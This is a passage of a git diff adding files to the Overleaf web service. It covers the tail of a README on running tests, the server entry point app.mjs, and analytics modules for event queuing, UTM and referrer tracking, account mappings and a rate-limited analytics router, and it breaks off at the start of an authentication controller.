+[overleaf/overleaf](https://github.com/overleaf/overleaf) repository.
+
+### Running the app
+
+The app runs natively using npm and Node on the local system:
+
+```
+$ npm install
+$ npm run start
+```
+
+### Running Tests
+
+To run all tests, run:
+```
+make test
+```
+
+To run both unit and acceptance tests for a module, run:
+```
+make test_module MODULE=saas-authentication
+```
+
+### Unit Tests
+
+The test suites run in Docker.
+
+Unit tests can be run in the `test_unit` container defined in `docker-compose.tests.yml`.
+
+The makefile contains a shortcut to run these:
+
+```
+make test_unit
+```
+
+During development it is often useful to only run a subset of tests, which can be configured with arguments to the mocha CLI:
+
+```
+make test_unit MOCHA_GREP='AuthorizationManager'
+```
+
+To run only the unit tests for a single module, run:
+```
+make test_unit_module MODULE=saas-authentication
+```
+
+Module tests can also use a MOCHA_GREP argument:
+```
+make test_unit_module MODULE=saas-authentication MOCHA_GREP=SSO
+```
+
+### Acceptance Tests
+
+Acceptance tests are run against a live service, which runs in the `acceptance_test` container defined in `docker-compose.tests.yml`.
+
+To run the tests out-of-the-box, the makefile defines:
+
+```
+make test_acceptance
+```
+
+However, during development it is often useful to leave the service running for rapid iteration on the acceptance tests. This can be done with:
+
+```
+make test_acceptance_app_start_service
+make test_acceptance_app_run # Run as many times as needed during development
+make test_acceptance_app_stop_service
+```
+
+`make test_acceptance` just runs these three commands in sequence and then runs `make test_acceptance_modules`, which runs the tests for each module in the `modules` directory. (Note that there is not currently an equivalent to the `-start` / `-run` x _n_ / `-stop` series for modules.)
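+
+A typical edit-test loop then looks like this (a sketch: `ProjectInvite` is just an
+example pattern, and this assumes `MOCHA_GREP` is honoured by the `_run` target in
+the same way as by the other test targets):
+
+```
+make test_acceptance_app_start_service
+# edit the tests, then re-run only the matching specs, as often as needed
+make test_acceptance_app_run MOCHA_GREP='ProjectInvite'
+make test_acceptance_app_stop_service
+```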
+ +During development it is often useful to only run a subset of tests, which can be configured with arguments to the mocha CLI: + +``` +make test_acceptance_run MOCHA_GREP='AuthorizationManager' +``` + +To run only the acceptance tests for a single module do: +``` +make test_acceptance_module MODULE=saas-authentication +``` + +Module tests can also use a MOCHA_GREP argument: +``` +make test_acceptance_module MODULE=saas-authentication MOCHA_GREP=SSO +``` + +Routes +------ + +Run `bin/routes` to print out all routes in the project. + + +License and Credits +------------------- + +This project is licensed under the [AGPLv3 license](http://www.gnu.org/licenses/agpl-3.0.html) + +### Stylesheets + +Overleaf is based on [Bootstrap](http://getbootstrap.com/), which is licensed under the +[MIT license](http://opensource.org/licenses/MIT). +All modifications (`*.less` files in `public/stylesheets`) are also licensed +under the MIT license. + +### Artwork + +#### Silk icon set 1.3 + +We gratefully acknowledge [Mark James](http://www.famfamfam.com/lab/icons/silk/) for +releasing his Silk icon set under the Creative Commons Attribution 2.5 license. Some +of these icons are used within Overleaf inside the `public/img/silk` and +`public/brand/icons` directories. + +#### IconShock icons + +We gratefully acknowledge [IconShock](http://www.iconshock.com) for use of the icons +in the `public/img/iconshock` directory found via +[findicons.com](http://findicons.com/icon/498089/height?id=526085#) + diff --git a/services/web/app.mjs b/services/web/app.mjs new file mode 100644 index 0000000..5ece02c --- /dev/null +++ b/services/web/app.mjs @@ -0,0 +1,110 @@ +// Metrics must be initialized before importing anything else +import '@overleaf/metrics/initialize.js' + +import Modules from './app/src/infrastructure/Modules.js' +import metrics from '@overleaf/metrics' +import Settings from '@overleaf/settings' +import logger from '@overleaf/logger' +import PlansLocator from './app/src/Features/Subscription/PlansLocator.js' +import HistoryManager from './app/src/Features/History/HistoryManager.js' +import SiteAdminHandler from './app/src/infrastructure/SiteAdminHandler.js' +import http from 'node:http' +import https from 'node:https' +import * as Serializers from './app/src/infrastructure/LoggerSerializers.js' +import Server from './app/src/infrastructure/Server.mjs' +import QueueWorkers from './app/src/infrastructure/QueueWorkers.js' +import mongodb from './app/src/infrastructure/mongodb.js' +import mongoose from './app/src/infrastructure/Mongoose.js' +import { triggerGracefulShutdown } from './app/src/infrastructure/GracefulShutdown.js' +import FileWriter from './app/src/infrastructure/FileWriter.js' +import { fileURLToPath } from 'node:url' +import Features from './app/src/infrastructure/Features.js' + +logger.initialize(process.env.METRICS_APP_NAME || 'web') +logger.logger.serializers.user = Serializers.user +logger.logger.serializers.docs = Serializers.docs +logger.logger.serializers.files = Serializers.files +logger.logger.serializers.project = Serializers.project +http.globalAgent.keepAlive = false +http.globalAgent.maxSockets = Settings.limits.httpGlobalAgentMaxSockets +https.globalAgent.keepAlive = false +https.globalAgent.maxSockets = Settings.limits.httpsGlobalAgentMaxSockets + +metrics.memory.monitor(logger) +metrics.leaked_sockets.monitor(logger) +metrics.open_sockets.monitor() + +if (Settings.catchErrors) { + process.removeAllListeners('uncaughtException') + process.removeAllListeners('unhandledRejection') 
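+  // Swap the default listeners (which would terminate the process) for
+  // logging-only handlers, so unexpected errors are recorded while the
+  // service keeps running.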
+ process + .on('uncaughtException', error => + logger.error({ err: error }, 'uncaughtException') + ) + .on('unhandledRejection', (reason, p) => { + logger.error({ err: reason }, 'unhandledRejection at Promise', p) + }) +} + +// Create ./data/dumpFolder if needed +FileWriter.ensureDumpFolderExists() + +if ( + !Features.hasFeature('project-history-blobs') && + !Features.hasFeature('filestore') +) { + throw new Error( + 'invalid config: must enable either project-history-blobs (Settings.enableProjectHistoryBlobs=true) or enable filestore (Settings.disableFilestore=false)' + ) +} + +const port = Settings.port || Settings.internal.web.port || 3000 +const host = Settings.internal.web.host || '127.0.0.1' +if (process.argv[1] === fileURLToPath(import.meta.url)) { + // Called directly + // We want to make sure that we provided a password through the environment. + if (!process.env.WEB_API_USER || !process.env.WEB_API_PASSWORD) { + throw new Error('No API user and password provided') + } + + PlansLocator.ensurePlansAreSetupCorrectly() + + Promise.all([ + mongodb.connectionPromise, + mongoose.connectionPromise, + HistoryManager.promises.loadGlobalBlobs(), + ]) + .then(async () => { + Server.server.listen(port, host, function () { + logger.debug(`web starting up, listening on ${host}:${port}`) + logger.debug(`${http.globalAgent.maxSockets} sockets enabled`) + // wait until the process is ready before monitoring the event loop + metrics.event_loop.monitor(logger) + }) + QueueWorkers.start() + await Modules.start() + }) + .catch(err => { + logger.fatal({ err }, 'Cannot connect to mongo. Exiting.') + process.exit(1) + }) +} + +// initialise site admin tasks +Promise.all([ + mongodb.connectionPromise, + mongoose.connectionPromise, + HistoryManager.promises.loadGlobalBlobs(), +]) + .then(() => SiteAdminHandler.initialise()) + .catch(err => { + logger.fatal({ err }, 'Cannot connect to mongo. 
Exiting.') + process.exit(1) + }) + +// handle SIGTERM for graceful shutdown in kubernetes +process.on('SIGTERM', function (signal) { + triggerGracefulShutdown(Server.server, signal) +}) + +export default Server.server diff --git a/services/web/app/src/Features/Analytics/AccountMappingHelper.js b/services/web/app/src/Features/Analytics/AccountMappingHelper.js new file mode 100644 index 0000000..5967149 --- /dev/null +++ b/services/web/app/src/Features/Analytics/AccountMappingHelper.js @@ -0,0 +1,97 @@ +const mappings = new Map([ + ['salesforce_id', generateSubscriptionToSalesforceMapping], + ['v1_id', generateSubscriptionToV1Mapping], + ['recurlySubscription_id', generateSubscriptionToRecurlyMapping], +]) + +/** + * @typedef {(import('./types.d.ts').AccountMapping)} AccountMapping + */ + +/** + * + * @param {Object} subscription + * @param {Object} updatedSubscription + * @return {Array<AccountMapping>} + */ +function extractAccountMappingsFromSubscription( + subscription, + updatedSubscription +) { + const accountMappings = [] + mappings.forEach((generateMapping, param) => { + if (updatedSubscription[param] || updatedSubscription[param] === '') { + if (subscription[param] !== updatedSubscription[param]) { + accountMappings.push( + generateMapping(subscription.id, updatedSubscription[param]) + ) + } + } + }) + return accountMappings +} + +function generateV1Mapping(v1Id, salesforceId, createdAt) { + return { + source: 'salesforce', + sourceEntity: 'account', + sourceEntityId: salesforceId, + target: 'v1', + targetEntity: 'university', + targetEntityId: v1Id, + createdAt, + } +} + +function generateSubscriptionToV1Mapping(subscriptionId, v1Id) { + return { + source: 'v1', + sourceEntity: 'university', + sourceEntityId: v1Id, + target: 'v2', + targetEntity: 'subscription', + targetEntityId: subscriptionId, + createdAt: new Date().toISOString(), + } +} + +function generateSubscriptionToSalesforceMapping(subscriptionId, salesforceId) { + return { + source: 'salesforce', + sourceEntity: 'account', + sourceEntityId: salesforceId, + target: 'v2', + targetEntity: 'subscription', + targetEntityId: subscriptionId, + createdAt: new Date().toISOString(), + } +} + +/** + * + * @param {string} subscriptionId + * @param {string} recurlyId + * @param {string} [createdAt] - Should be an ISO date + * @return {AccountMapping} + */ +function generateSubscriptionToRecurlyMapping( + subscriptionId, + recurlyId, + createdAt = new Date().toISOString() +) { + return { + source: 'recurly', + sourceEntity: 'subscription', + sourceEntityId: recurlyId, + target: 'v2', + targetEntity: 'subscription', + targetEntityId: subscriptionId, + createdAt, + } +} + +module.exports = { + extractAccountMappingsFromSubscription, + generateV1Mapping, + generateSubscriptionToRecurlyMapping, +} diff --git a/services/web/app/src/Features/Analytics/AnalyticsController.mjs b/services/web/app/src/Features/Analytics/AnalyticsController.mjs new file mode 100644 index 0000000..7d9188f --- /dev/null +++ b/services/web/app/src/Features/Analytics/AnalyticsController.mjs @@ -0,0 +1,65 @@ +import metrics from '@overleaf/metrics' +import AnalyticsManager from './AnalyticsManager.js' +import SessionManager from '../Authentication/SessionManager.js' +import GeoIpLookup from '../../infrastructure/GeoIpLookup.js' +import Features from '../../infrastructure/Features.js' +import { expressify } from '@overleaf/promise-utils' +import AccountMappingHelper from './AccountMappingHelper.js' + +async function registerSalesforceMapping(req, res, next) { + if 
(!Features.hasFeature('analytics')) { + return res.sendStatus(202) + } + const { createdAt, salesforceId, v1Id } = req.body + AnalyticsManager.registerAccountMapping( + AccountMappingHelper.generateV1Mapping(v1Id, salesforceId, createdAt) + ) + res.sendStatus(202) +} + +async function updateEditingSession(req, res, next) { + if (!Features.hasFeature('analytics')) { + return res.sendStatus(202) + } + const userId = SessionManager.getLoggedInUserId(req.session) + const { projectId } = req.params + const segmentation = req.body.segmentation || {} + let countryCode = null + + if (userId) { + try { + const geoDetails = await GeoIpLookup.promises.getDetails(req.ip) + if (geoDetails && geoDetails.country_code) { + countryCode = geoDetails.country_code + } + AnalyticsManager.updateEditingSession( + userId, + projectId, + countryCode, + segmentation + ) + } catch (error) { + metrics.inc('analytics_geo_ip_lookup_errors') + } + } + res.sendStatus(202) +} + +function recordEvent(req, res, next) { + if (!Features.hasFeature('analytics')) { + return res.sendStatus(202) + } + delete req.body._csrf + AnalyticsManager.recordEventForSession( + req.session, + req.params.event, + req.body + ) + res.sendStatus(202) +} + +export default { + registerSalesforceMapping: expressify(registerSalesforceMapping), + updateEditingSession: expressify(updateEditingSession), + recordEvent, +} diff --git a/services/web/app/src/Features/Analytics/AnalyticsManager.js b/services/web/app/src/Features/Analytics/AnalyticsManager.js new file mode 100644 index 0000000..4afdb08 --- /dev/null +++ b/services/web/app/src/Features/Analytics/AnalyticsManager.js @@ -0,0 +1,404 @@ +const SessionManager = require('../Authentication/SessionManager') +const UserAnalyticsIdCache = require('./UserAnalyticsIdCache') +const Settings = require('@overleaf/settings') +const Metrics = require('../../infrastructure/Metrics') +const Queues = require('../../infrastructure/Queues') +const crypto = require('crypto') +const _ = require('lodash') +const { expressify } = require('@overleaf/promise-utils') +const logger = require('@overleaf/logger') + +const analyticsEventsQueue = Queues.getQueue('analytics-events') +const analyticsEditingSessionsQueue = Queues.getQueue( + 'analytics-editing-sessions' +) +const analyticsUserPropertiesQueue = Queues.getQueue( + 'analytics-user-properties' +) +const analyticsAccountMappingQueue = Queues.getQueue( + 'analytics-account-mapping' +) + +const ONE_MINUTE_MS = 60 * 1000 + +const UUID_REGEXP = /^[\w]{8}(-[\w]{4}){3}-[\w]{12}$/ + +function identifyUser(userId, analyticsId, isNewUser) { + if (!userId || !analyticsId || !analyticsId.toString().match(UUID_REGEXP)) { + return + } + if (_isAnalyticsDisabled() || _isSmokeTestUser(userId)) { + return + } + Metrics.analyticsQueue.inc({ status: 'adding', event_type: 'identify' }) + Queues.createScheduledJob( + 'analytics-events', + { + name: 'identify', + data: { userId, analyticsId, isNewUser, createdAt: new Date() }, + }, + ONE_MINUTE_MS + ) + .then(() => { + Metrics.analyticsQueue.inc({ status: 'added', event_type: 'identify' }) + }) + .catch(() => { + Metrics.analyticsQueue.inc({ status: 'error', event_type: 'identify' }) + }) +} + +async function recordEventForUser(userId, event, segmentation) { + if (!userId) { + return + } + if (_isAnalyticsDisabled() || _isSmokeTestUser(userId)) { + return + } + const analyticsId = await UserAnalyticsIdCache.get(userId) + if (analyticsId) { + _recordEvent({ analyticsId, userId, event, segmentation, isLoggedIn: true }) + } +} + +function 
recordEventForUserInBackground(userId, event, segmentation) { + recordEventForUser(userId, event, segmentation).catch(err => { + logger.warn( + { err, userId, event, segmentation }, + 'failed to record event for user' + ) + }) +} + +function recordEventForSession(session, event, segmentation) { + const { analyticsId, userId } = getIdsFromSession(session) + if (!analyticsId) { + return + } + if (_isAnalyticsDisabled() || _isSmokeTestUser(userId)) { + return + } + _recordEvent({ + analyticsId, + userId, + event, + segmentation, + isLoggedIn: !!userId, + createdAt: new Date(), + }) +} + +async function setUserPropertyForUser(userId, propertyName, propertyValue) { + if (_isAnalyticsDisabled() || _isSmokeTestUser(userId)) { + return + } + + _checkPropertyValue(propertyValue) + + const analyticsId = await UserAnalyticsIdCache.get(userId) + if (analyticsId) { + await _setUserProperty({ analyticsId, propertyName, propertyValue }) + } +} + +function setUserPropertyForUserInBackground(userId, property, value) { + setUserPropertyForUser(userId, property, value).catch(err => { + logger.warn( + { err, userId, property, value }, + 'failed to set user property for user' + ) + }) +} + +async function setUserPropertyForAnalyticsId( + analyticsId, + propertyName, + propertyValue +) { + if (_isAnalyticsDisabled()) { + return + } + + _checkPropertyValue(propertyValue) + + await _setUserProperty({ analyticsId, propertyName, propertyValue }) +} + +async function setUserPropertyForSession(session, propertyName, propertyValue) { + const { analyticsId, userId } = getIdsFromSession(session) + if (_isAnalyticsDisabled() || _isSmokeTestUser(userId)) { + return + } + + _checkPropertyValue(propertyValue) + + if (analyticsId) { + await _setUserProperty({ analyticsId, propertyName, propertyValue }) + } +} + +function setUserPropertyForSessionInBackground(session, property, value) { + setUserPropertyForSession(session, property, value).catch(err => { + const { analyticsId, userId } = getIdsFromSession(session) + logger.warn( + { err, analyticsId, userId, property, value }, + 'failed to set user property for session' + ) + }) +} + +/** + * @typedef {(import('./types').AccountMapping)} AccountMapping + */ + +/** + * Register mapping between two accounts. + * + * @param {AccountMapping} payload - The event payload to send to Analytics + */ +function registerAccountMapping({ + source, + sourceEntity, + sourceEntityId, + target, + targetEntity, + targetEntityId, + createdAt, +}) { + Metrics.analyticsQueue.inc({ + status: 'adding', + event_type: 'account-mapping', + }) + + analyticsAccountMappingQueue + .add('account-mapping', { + source, + sourceEntity, + sourceEntityId, + target, + targetEntity, + targetEntityId, + createdAt: createdAt ?? 
new Date(), + }) + .then(() => { + Metrics.analyticsQueue.inc({ + status: 'added', + event_type: 'account-mapping', + }) + }) + .catch(() => { + Metrics.analyticsQueue.inc({ + status: 'error', + event_type: 'account-mapping', + }) + }) +} + +function updateEditingSession(userId, projectId, countryCode, segmentation) { + if (!userId) { + return + } + if (_isAnalyticsDisabled() || _isSmokeTestUser(userId)) { + return + } + if (!_isSegmentationValid(segmentation)) { + logger.info( + { userId, projectId, segmentation }, + 'rejecting analytics editing session due to bad segmentation' + ) + return + } + Metrics.analyticsQueue.inc({ + status: 'adding', + event_type: 'editing-session', + }) + analyticsEditingSessionsQueue + .add('editing-session', { + userId, + projectId, + countryCode, + segmentation, + createdAt: new Date(), + }) + .then(() => { + Metrics.analyticsQueue.inc({ + status: 'added', + event_type: 'editing-session', + }) + }) + .catch(() => { + Metrics.analyticsQueue.inc({ + status: 'error', + event_type: 'editing-session', + }) + }) +} + +function _recordEvent( + { analyticsId, userId, event, segmentation, isLoggedIn }, + { delay } = {} +) { + if (!_isAttributeValid(event)) { + logger.info( + { analyticsId, event, segmentation }, + 'rejecting analytics event due to bad event name' + ) + return + } + if (!_isSegmentationValid(segmentation)) { + logger.info( + { analyticsId, event, segmentation }, + 'rejecting analytics event due to bad segmentation' + ) + return + } + logger.debug( + { + analyticsId, + userId, + event, + segmentation, + isLoggedIn: !!userId, + createdAt: new Date(), + }, + 'queueing analytics event' + ) + Metrics.analyticsQueue.inc({ status: 'adding', event_type: 'event' }) + analyticsEventsQueue + .add( + 'event', + { + analyticsId, + userId, + event, + segmentation, + isLoggedIn, + createdAt: new Date(), + }, + { delay } + ) + .then(() => { + Metrics.analyticsQueue.inc({ status: 'added', event_type: 'event' }) + }) + .catch(() => { + Metrics.analyticsQueue.inc({ status: 'error', event_type: 'event' }) + }) +} + +async function _setUserProperty({ analyticsId, propertyName, propertyValue }) { + if (!_isAttributeValid(propertyName)) { + logger.info( + { analyticsId, propertyName, propertyValue }, + 'rejecting analytics user property due to bad name' + ) + return + } + if (!_isAttributeValueValid(propertyValue)) { + logger.info( + { analyticsId, propertyName, propertyValue }, + 'rejecting analytics user property due to bad value' + ) + return + } + Metrics.analyticsQueue.inc({ + status: 'adding', + event_type: 'user-property', + }) + await analyticsUserPropertiesQueue + .add('user-property', { + analyticsId, + propertyName, + propertyValue, + createdAt: new Date(), + }) + .then(() => { + Metrics.analyticsQueue.inc({ + status: 'added', + event_type: 'user-property', + }) + }) + .catch(() => { + Metrics.analyticsQueue.inc({ + status: 'error', + event_type: 'user-property', + }) + }) +} + +function _isSmokeTestUser(userId) { + const smokeTestUserId = Settings.smokeTest && Settings.smokeTest.userId + return ( + smokeTestUserId != null && + userId != null && + userId.toString() === smokeTestUserId + ) +} + +function _isAnalyticsDisabled() { + return !(Settings.analytics && Settings.analytics.enabled) +} + +function _checkPropertyValue(propertyValue) { + if (propertyValue === undefined) { + throw new Error( + 'propertyValue cannot be undefined, use null to unset a property' + ) + } +} + +function _isAttributeValid(attribute) { + return !attribute || 
/^[a-zA-Z0-9-_.:;,/]+$/.test(attribute) +} + +function _isAttributeValueValid(attributeValue) { + return _isAttributeValid(attributeValue) || attributeValue instanceof Date +} + +function _isSegmentationValid(segmentation) { + if (segmentation) { + for (const key of Object.keys(segmentation)) { + if (!_isAttributeValid(key)) { + return false + } + } + } + + return true +} + +function getIdsFromSession(session) { + const analyticsId = _.get(session, ['analyticsId']) + const userId = SessionManager.getLoggedInUserId(session) + return { analyticsId, userId } +} + +async function analyticsIdMiddleware(req, res, next) { + const session = req.session + const sessionUser = SessionManager.getSessionUser(session) + + if (sessionUser) { + session.analyticsId = await UserAnalyticsIdCache.get(sessionUser._id) + } else if (!session.analyticsId) { + // generate an `analyticsId` if needed + session.analyticsId = crypto.randomUUID() + } + + res.locals.getSessionAnalyticsId = () => session.analyticsId + + next() +} + +module.exports = { + identifyUser, + recordEventForSession, + recordEventForUser, + recordEventForUserInBackground, + setUserPropertyForUser, + setUserPropertyForUserInBackground, + setUserPropertyForSession, + setUserPropertyForSessionInBackground, + setUserPropertyForAnalyticsId, + updateEditingSession, + getIdsFromSession, + registerAccountMapping, + analyticsIdMiddleware: expressify(analyticsIdMiddleware), +} diff --git a/services/web/app/src/Features/Analytics/AnalyticsProxy.mjs b/services/web/app/src/Features/Analytics/AnalyticsProxy.mjs new file mode 100644 index 0000000..e7296ad --- /dev/null +++ b/services/web/app/src/Features/Analytics/AnalyticsProxy.mjs @@ -0,0 +1,28 @@ +import settings from '@overleaf/settings' +import Errors from '../Errors/Errors.js' +import httpProxy from 'express-http-proxy' + +export default { + call(basePath) { + if (!settings.apis.analytics) { + return (req, res, next) => + next( + new Errors.ServiceNotConfiguredError( + 'Analytics service not configured' + ) + ) + } + + return httpProxy(settings.apis.analytics.url, { + proxyReqPathResolver(req) { + // req.url is the part of the path that comes after the mount point in + // app.use() + return `${basePath}${req.url}` + }, + proxyReqOptDecorator(proxyReqOpts, srcReq) { + proxyReqOpts.headers = {} // unset all headers + return proxyReqOpts + }, + }) + }, +} diff --git a/services/web/app/src/Features/Analytics/AnalyticsRegistrationSourceHelper.js b/services/web/app/src/Features/Analytics/AnalyticsRegistrationSourceHelper.js new file mode 100644 index 0000000..6166f08 --- /dev/null +++ b/services/web/app/src/Features/Analytics/AnalyticsRegistrationSourceHelper.js @@ -0,0 +1,96 @@ +const AnalyticsManager = require('./AnalyticsManager') +const RequestHelper = require('./RequestHelper') + +function clearSource(session) { + if (session) { + delete session.required_login_from_product_medium + delete session.required_login_from_product_source + } +} + +function setInbound(session, url, query, referrer) { + const inboundSession = { + referrer: RequestHelper.parseReferrer(referrer, url), + utm: RequestHelper.parseUtm(query), + } + + if (inboundSession.referrer || inboundSession.utm) { + session.inbound = inboundSession + } +} + +function clearInbound(session) { + if (session) { + delete session.inbound + } +} + +function addUserProperties(userId, session) { + if (!session) { + return + } + + if (session.required_login_from_product_medium) { + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 
`registered-from-product-medium`, + session.required_login_from_product_medium + ) + if (session.required_login_from_product_source) { + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + `registered-from-product-source`, + session.required_login_from_product_source + ) + } + } else if (session.referal_id) { + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + `registered-from-bonus-scheme`, + true + ) + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + `registered-from-product-medium`, + 'bonus-scheme' + ) + } + + if (session.inbound) { + if (session.inbound.referrer && session.inbound.referrer.medium) { + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + `registered-from-referrer-medium`, + `${session.inbound.referrer.medium + .charAt(0) + .toUpperCase()}${session.inbound.referrer.medium.slice(1)}` + ) + if (session.inbound.referrer.source) { + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + `registered-from-referrer-source`, + session.inbound.referrer.source + ) + } + } + + if (session.inbound.utm) { + for (const utmKey of RequestHelper.UTM_KEYS) { + if (session.inbound.utm[utmKey]) { + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + `registered-from-${utmKey.replace('_', '-')}`, + session.inbound.utm[utmKey] + ) + } + } + } + } +} + +module.exports = { + clearSource, + setInbound, + clearInbound, + addUserProperties, +} diff --git a/services/web/app/src/Features/Analytics/AnalyticsRegistrationSourceMiddleware.js b/services/web/app/src/Features/Analytics/AnalyticsRegistrationSourceMiddleware.js new file mode 100644 index 0000000..733d636 --- /dev/null +++ b/services/web/app/src/Features/Analytics/AnalyticsRegistrationSourceMiddleware.js @@ -0,0 +1,58 @@ +const logger = require('@overleaf/logger') +const OError = require('@overleaf/o-error') +const AnalyticsRegistrationSourceHelper = require('./AnalyticsRegistrationSourceHelper') +const SessionManager = require('../../Features/Authentication/SessionManager') + +function setSource(medium, source) { + return function (req, res, next) { + if (req.session) { + req.session.required_login_from_product_medium = medium + if (source) { + req.session.required_login_from_product_source = source + } + } + next() + } +} + +function clearSource() { + return function (req, res, next) { + AnalyticsRegistrationSourceHelper.clearSource(req.session) + next() + } +} + +function setInbound() { + return function setInbound(req, res, next) { + if (req.session.inbound) { + return next() // don't overwrite referrer + } + + if (SessionManager.isUserLoggedIn(req.session)) { + return next() // don't store referrer if user is already logged in + } + + const referrer = req.header('referrer') + try { + AnalyticsRegistrationSourceHelper.setInbound( + req.session, + req.url, + req.query, + referrer + ) + } catch (error) { + // log errors and fail silently + OError.tag(error, 'failed to parse inbound referrer', { + referrer, + }) + logger.warn({ error }, error.message) + } + next() + } +} + +module.exports = { + setSource, + clearSource, + setInbound, +} diff --git a/services/web/app/src/Features/Analytics/AnalyticsRouter.mjs b/services/web/app/src/Features/Analytics/AnalyticsRouter.mjs new file mode 100644 index 0000000..933d4b0 --- /dev/null +++ b/services/web/app/src/Features/Analytics/AnalyticsRouter.mjs @@ -0,0 +1,51 @@ +import AuthenticationController from './../Authentication/AuthenticationController.js' +import AnalyticsController from './AnalyticsController.mjs' +import 
AnalyticsProxy from './AnalyticsProxy.mjs' +import { RateLimiter } from '../../infrastructure/RateLimiter.js' +import RateLimiterMiddleware from '../Security/RateLimiterMiddleware.js' + +const rateLimiters = { + recordEvent: new RateLimiter('analytics-record-event', { + points: 200, + duration: 60, + }), + updateEditingSession: new RateLimiter('analytics-update-editing-session', { + points: 20, + duration: 60, + }), + uniExternalCollabProxy: new RateLimiter( + 'analytics-uni-external-collab-proxy', + { points: 20, duration: 60 } + ), +} + +export default { + apply(webRouter, privateApiRouter, publicApiRouter) { + webRouter.post( + '/event/:event([a-z0-9-_]+)', + RateLimiterMiddleware.rateLimit(rateLimiters.recordEvent), + AnalyticsController.recordEvent + ) + + webRouter.put( + '/editingSession/:projectId', + RateLimiterMiddleware.rateLimit(rateLimiters.updateEditingSession, { + params: ['projectId'], + }), + AnalyticsController.updateEditingSession + ) + + publicApiRouter.use( + '/analytics/uniExternalCollaboration', + AuthenticationController.requirePrivateApiAuth(), + RateLimiterMiddleware.rateLimit(rateLimiters.uniExternalCollabProxy), + AnalyticsProxy.call('/uniExternalCollaboration') + ) + + publicApiRouter.post( + '/analytics/register-v-1-salesforce-mapping', + AuthenticationController.requirePrivateApiAuth(), + AnalyticsController.registerSalesforceMapping + ) + }, +} diff --git a/services/web/app/src/Features/Analytics/AnalyticsUTMTrackingMiddleware.mjs b/services/web/app/src/Features/Analytics/AnalyticsUTMTrackingMiddleware.mjs new file mode 100644 index 0000000..d2f1f70 --- /dev/null +++ b/services/web/app/src/Features/Analytics/AnalyticsUTMTrackingMiddleware.mjs @@ -0,0 +1,58 @@ +import _ from 'lodash' +import RequestHelper from './RequestHelper.js' +import AnalyticsManager from './AnalyticsManager.js' +import querystring from 'node:querystring' +import { URL } from 'node:url' +import Settings from '@overleaf/settings' +import OError from '@overleaf/o-error' +import logger from '@overleaf/logger' + +function recordUTMTags() { + return function (req, res, next) { + const query = req.query + + try { + const utmValues = RequestHelper.parseUtm(query) + + if (utmValues) { + const path = new URL(req.url, Settings.siteUrl).pathname + + AnalyticsManager.recordEventForSession(req.session, 'page-view', { + path, + ...utmValues, + }) + + const propertyValue = `${utmValues.utm_source || 'N/A'};${ + utmValues.utm_medium || 'N/A' + };${utmValues.utm_campaign || 'N/A'};${ + utmValues.utm_content || utmValues.utm_term || 'N/A' + }` + AnalyticsManager.setUserPropertyForSessionInBackground( + req.session, + 'utm-tags', + propertyValue + ) + + // redirect to URL without UTM query params + const queryWithoutUtm = _.omit(query, RequestHelper.UTM_KEYS) + const queryString = + Object.keys(queryWithoutUtm).length > 0 + ? '?' 
+ querystring.stringify(queryWithoutUtm) + : '' + return res.redirect(path + queryString) + } + } catch (error) { + // log errors and fail silently + OError.tag(error, 'failed to track UTM tags', { + query, + }) + logger.warn({ error }, error.message) + } + + next() + } +} + +export default { + recordUTMTags, +} diff --git a/services/web/app/src/Features/Analytics/RequestHelper.js b/services/web/app/src/Features/Analytics/RequestHelper.js new file mode 100644 index 0000000..08a6566 --- /dev/null +++ b/services/web/app/src/Features/Analytics/RequestHelper.js @@ -0,0 +1,56 @@ +const RefererParser = require('referer-parser') +const { URL } = require('url') + +const UTM_KEYS = [ + 'utm_campaign', + 'utm_source', + 'utm_term', + 'utm_content', + 'utm_medium', + 'utm_count', +] + +function parseUtm(query) { + const utmValues = {} + for (const utmKey of UTM_KEYS) { + if (query[utmKey]) { + utmValues[utmKey] = query[utmKey] + } + } + return Object.keys(utmValues).length > 0 ? utmValues : null +} + +function parseReferrer(referrer, url) { + if (!referrer) { + return { + medium: 'direct', + } + } + + const parsedReferrer = new RefererParser(referrer, url) + + const referrerValues = { + medium: parsedReferrer.medium, + source: parsedReferrer.referer || 'other', + } + + if (referrerValues.medium === 'unknown') { + try { + const referrerHostname = new URL(referrer).hostname + if (referrerHostname) { + referrerValues.medium = 'link' + referrerValues.source = referrerHostname + } + } catch (error) { + // ignore referrer parsing errors + } + } + + return referrerValues +} + +module.exports = { + UTM_KEYS, + parseUtm, + parseReferrer, +} diff --git a/services/web/app/src/Features/Analytics/UserAnalyticsIdCache.js b/services/web/app/src/Features/Analytics/UserAnalyticsIdCache.js new file mode 100644 index 0000000..97b4e80 --- /dev/null +++ b/services/web/app/src/Features/Analytics/UserAnalyticsIdCache.js @@ -0,0 +1,31 @@ +const UserGetter = require('../User/UserGetter') +const { CacheLoader } = require('cache-flow') +const { callbackify } = require('util') + +class UserAnalyticsIdCache extends CacheLoader { + constructor() { + super('user-analytics-id', { + expirationTime: 60, + maxSize: 10000, + }) + } + + async load(userId) { + const user = await UserGetter.promises.getUser(userId, { analyticsId: 1 }) + if (user) { + return user.analyticsId || user._id.toString() + } + } + + keyToString(userId) { + if (userId) { + return userId.toString() + } + } +} + +const userAnalyticsIdCache = new UserAnalyticsIdCache() +userAnalyticsIdCache.callbacks = { + get: callbackify(userAnalyticsIdCache.get).bind(userAnalyticsIdCache), +} +module.exports = userAnalyticsIdCache diff --git a/services/web/app/src/Features/Analytics/types.d.ts b/services/web/app/src/Features/Analytics/types.d.ts new file mode 100644 index 0000000..44df848 --- /dev/null +++ b/services/web/app/src/Features/Analytics/types.d.ts @@ -0,0 +1,9 @@ +export type AccountMapping = { + source: string + sourceEntity: string + sourceEntityId: string + target: string + targetEntity: string + targetEntityId: string + createdAt: string +} diff --git a/services/web/app/src/Features/Authentication/AuthenticationController.js b/services/web/app/src/Features/Authentication/AuthenticationController.js new file mode 100644 index 0000000..7a97d2a --- /dev/null +++ b/services/web/app/src/Features/Authentication/AuthenticationController.js @@ -0,0 +1,671 @@ +const AuthenticationManager = require('./AuthenticationManager') +const SessionManager = require('./SessionManager') 
